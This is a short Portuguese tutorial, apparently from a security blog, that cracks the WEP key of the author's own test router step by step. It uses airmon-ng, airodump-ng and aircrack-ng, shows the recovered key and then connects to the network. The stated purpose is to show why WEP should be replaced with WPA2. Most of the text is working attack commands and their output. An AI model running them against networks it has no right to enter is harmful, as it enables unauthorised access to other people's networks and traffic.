Revelar a chave WEP de um roteador Wireless é uma atividade simples de ser realizada, sabemos que há inúmeros roteadores de muitas empresas/residências com esta configuração, nosso papel como profissionais de segurança da informação é orientar para que seja realizada a alteração desta configuração para uma solução mais segura como WPA2 por exemplo. | ||
Segue abaixo o passo a passo de como relevar uma chave WEP. | ||
01 — Passo | ||
Configurando o roteador Wireless. | ||
Name (SSID): 100SECURITY | ||
02 — Passo | ||
Verificação da Interface wlan1. | ||
ifconfig wlan1 | ||
03 — Passo | ||
Listando todas as redes disponíveis. | ||
iwlist scan | ||
Resultado do Scan: | ||
NMAC Address: 00:1F:33:22:5B:50 | ||
04 — Passo | ||
Iniciando o Modo Monitor do airmon-ng sobre a Interface wlan1. | ||
airmon-ng start wlan1 | ||
Modo Monitor iniciado: | ||
Observe que Modo Monitor da interface wlan1 foi habilitado para a interface mon0. | ||
mon0 — Interface de rede que funciona de modo promíscuo. | ||
05 — Passo | ||
Utilizando o airodump-ng para capturar os dados. | ||
airodump-ng –-ivs -w senha -c 6 mon0 | ||
airodump-ng : Programa utilizado para fazer o Dump dos pacotes. | ||
06 — Passo | ||
Monitorando a captura de dados. | ||
Quando a coluna #Data ultrapassar 20.000 já se considera possível a quebra completa da chave. | ||
No ex.: 21058 IVs foram capturados. | ||
07 — Passo | ||
Revelando a Chave WEP. | ||
aircrack-ng -a 1 senha-01.ivs | ||
aircrack-ng : Programa utilizado para quebra a senha dos IVs capturados | ||
Chave Encontrada: | ||
KEY FOUND! [ 0AA:84:65:E6:A4 ]. | ||
08 — Passo | ||
Editando e configurando o arquivo interfaces. | ||
vim /etc/network/interfaces | ||
auto wlan1 | ||
09 — Passo | ||
Reiniciando as interfaces. | ||
./etc/init.d/networking restart | ||
Atribuição de IP via DHCP. | ||
10 — Passo | ||
Exibindo as definições da interface wlan1. | ||
ESSID: “100SECURITY” | ||
iwconfig wlan1 | ||